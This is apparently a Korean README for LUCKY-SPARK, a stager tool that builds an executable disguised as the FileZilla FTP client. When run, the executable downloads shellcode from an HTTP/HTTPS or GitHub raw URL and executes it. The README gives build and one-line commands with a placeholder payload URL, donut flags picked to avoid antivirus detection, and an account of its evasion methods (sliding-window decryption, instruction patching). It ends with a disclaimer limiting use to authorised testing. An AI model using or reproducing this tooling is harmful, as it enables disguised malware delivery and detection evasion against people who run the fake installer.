
http/https(예: Sliver) 또는 github raw를 통해 스테이징되는 셸코드 페이로드를 위해 설계된 은밀한 스테이저.
⟪ LUCKY-SPARK ⟫는 sliver 또는 github raw와 같은 http/https로 스테이징되는 셸코드 페이로드를 위해 설계된 스테이저입니다. 페이로드의 슬라이딩 윈도우 JIT(just-in-time) 복호화 및 CPU 명령어 패칭과 같은 현대적인 난독화 및 회피 방법을 사용합니다. 기본적으로 FileZilla FTP 클라이언트로 위장하는 실행 파일을 생성합니다.
저장소를 클론하거나 다운로드하고 시스템에 make와 mingw가 설치되어 있는지 확인하세요.
git clone <repository_url>
cd LUCKY-SPARK
바이너리 생성 스크립트를 실행하세요.
./luckySpark.sh
스테이징된 페이로드의 URL과 선택적 User-Agent를 입력하라는 메시지가 표시됩니다.

한 줄로 실행할 수 있어 스크립트에 통합할 수 있습니다:
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

donut 또는 Sliver(donut을 사용)를 사용한다면 페이로드를 생성할 때 다음 플래그를 권장합니다:
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin
이것은 donut의 의심스럽고 플래그되는 동작을 피합니다. 특히 donut의 회피 기능은 역설적으로 매우 높게 플래그됩니다.
이것은 실행 시 페이로드를 가져와서 실행하는 filezilla.exe 바이너리를 생성합니다.
이 스테이저는 Sliver와 함께 사용하도록 설계되었습니다. Sliver Staging에 설명된 대로 Sliver 페이로드를 스테이징하세요. 페이로드를 암호화하지 마세요.
하지만 http/https 기반의 모든 스테이징 방법이 작동합니다.
python3 -m http.server와 같은 방법이나 공개 저장소의 github.com에 업로드된 페이로드도 가능합니다.
이 스테이저는 meterpreter 스테이징 프로토콜을 지원하지 않습니다.
Step 1: RIP hits Page 0 and Page 0 gets decrypted
Pages: [ D | E | E | ... ]
RIP -> ^
Step 2: RIP hits Page 1 and Page 1 gets decrypted
Pages: [ D | D | E | ... ]
RIP -> ^
Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
Pages: [ E | D | D | ... ]
RIP -> ^
LUCKY-SPARK는 교육, 연구 및 승인된 침투 테스트 목적으로만 사용됩니다. 허가 없이 시스템을 무단 사용하는 것은 불법이며 비윤리적입니다.